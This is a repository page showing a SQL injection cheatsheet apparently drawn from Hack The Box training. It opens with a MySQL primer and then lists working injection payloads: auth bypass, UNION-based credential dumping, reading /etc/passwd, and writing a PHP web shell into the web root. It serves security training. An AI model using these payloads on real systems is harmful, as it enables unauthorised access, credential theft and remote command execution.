daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

sql-injection.md (4760B)


      1 ---
      2 title: "SQL Injection Fundamentals"
      3 description: "Manual SQL injection: auth bypass, UNION, error/blind, DB fingerprinting and file read/write."
      4 category: web
      5 tags: [web, sql-injection, injection]
      6 tools: [MySQL client]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "repo:HTB/cheatsheet-sql-injection-fundamentals.pdf"
     10 ---
     11 
     12 # SQL Injection Fundamentals
     13 
     14 Manual MySQL/MariaDB injection reference: SQL primer, auth bypass, UNION-based extraction, database enumeration, privilege checks, and file read/write.
     15 
     16 ## MySQL Primer
     17 
     18 ### General
     19 
     20 ```sql
     21 -- Login to a MySQL database
     22 mysql -u root -h docker.hackthebox.eu -P 3306 -p
     23 
     24 -- List available databases
     25 SHOW DATABASES;
     26 
     27 -- Switch to a database
     28 USE users;
     29 ```
     30 
     31 ### Tables
     32 
     33 ```sql
     34 -- Add a new table
     35 CREATE TABLE logins (id INT, ...);
     36 
     37 -- List available tables in the current database
     38 SHOW TABLES;
     39 
     40 -- Show table properties and columns
     41 DESCRIBE logins;
     42 
     43 -- Add values to a table
     44 INSERT INTO table_name VALUES (value_1, ...);
     45 
     46 -- Add values to specific columns in a table
     47 INSERT INTO table_name(column2, ...) VALUES (column2_value, ...);
     48 
     49 -- Update table values
     50 UPDATE table_name SET column1=newvalue1, ... WHERE <condition>;
     51 ```
     52 
     53 ### Querying Data
     54 
     55 ```sql
     56 -- Show all columns in a table
     57 SELECT * FROM table_name;
     58 
     59 -- Show specific columns
     60 SELECT column1, column2 FROM table_name;
     61 
     62 -- Delete a table
     63 DROP TABLE logins;
     64 
     65 -- Add a new column
     66 ALTER TABLE logins ADD newColumn INT;
     67 
     68 -- Rename a column
     69 ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;
     70 
     71 -- Change a column datatype
     72 ALTER TABLE logins MODIFY oldColumn DATE;
     73 
     74 -- Delete a column
     75 ALTER TABLE logins DROP oldColumn;
     76 ```
     77 
     78 ### Output Control
     79 
     80 ```sql
     81 -- Sort by column
     82 SELECT * FROM logins ORDER BY column_1;
     83 
     84 -- Sort by column, descending
     85 SELECT * FROM logins ORDER BY column_1 DESC;
     86 
     87 -- Sort by two columns
     88 SELECT * FROM logins ORDER BY column_1 DESC, id ASC;
     89 
     90 -- Only show first two results
     91 SELECT * FROM logins LIMIT 2;
     92 
     93 -- Only show two results starting from index 1
     94 SELECT * FROM logins LIMIT 1, 2;
     95 
     96 -- List results that meet a condition
     97 SELECT * FROM table_name WHERE <condition>;
     98 
     99 -- List results where a name is similar to a given string
    100 SELECT * FROM logins WHERE username LIKE 'admin%';
    101 ```
    102 
    103 ## MySQL Operator Precedence
    104 
    105 From highest to lowest:
    106 
    107 1. Division (`/`), Multiplication (`*`), and Modulus (`%`)
    108 2. Addition (`+`) and Subtraction (`-`)
    109 3. Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`)
    110 4. NOT (`!`)
    111 5. AND (`&&`)
    112 6. OR (`||`)
    113 
    114 ## SQL Injection
    115 
    116 ### Auth Bypass
    117 
    118 ```sql
    119 -- Basic auth bypass
    120 admin' or '1'='1
    121 
    122 -- Basic auth bypass with comments
    123 admin')-- -
    124 ```
    125 
    126 ### UNION Injection
    127 
    128 ```sql
    129 -- Detect number of columns using ORDER BY
    130 ' order by 1-- -
    131 
    132 -- Detect number of columns using UNION injection
    133 cn' UNION select 1,2,3-- -
    134 
    135 -- Basic UNION injection
    136 cn' UNION select 1,@@version,3,4-- -
    137 
    138 -- UNION injection for 4 columns
    139 UNION select username, 2, 3, 4 from passwords-- -
    140 ```
    141 
    142 ### DB Enumeration
    143 
    144 ```sql
    145 -- Fingerprint MySQL with query output
    146 SELECT @@version
    147 
    148 -- Fingerprint MySQL with no output (time-based)
    149 SELECT SLEEP(5)
    150 
    151 -- Current database name
    152 cn' UNION select 1,database(),2,3-- -
    153 
    154 -- List all databases
    155 cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
    156 
    157 -- List all tables in a specific database
    158 cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
    159 
    160 -- List all columns in a specific table
    161 cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
    162 
    163 -- Dump data from a table in another database
    164 cn' UNION select 1, username, password, 4 from dev.credentials-- -
    165 ```
    166 
    167 ### Privileges
    168 
    169 ```sql
    170 -- Find current user
    171 cn' UNION SELECT 1, user(), 3, 4-- -
    172 
    173 -- Find if the user has admin privileges
    174 cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
    175 
    176 -- Find all user privileges
    177 cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -
    178 
    179 -- Find which directories can be accessed through MySQL
    180 cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
    181 ```
    182 
    183 ### File Injection
    184 
    185 ```sql
    186 -- Read a local file
    187 cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
    188 
    189 -- Write a string to a local file
    190 select 'file written successfully!' into outfile '/var/www/html/proof.txt'
    191 
    192 -- Write a web shell into the base web directory
    193 cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
    194 ```
    195 
    196 > **Note —** `INTO OUTFILE` write access depends on the `secure_file_priv` setting and filesystem permissions of the MySQL service account. `LOAD_FILE` is similarly constrained.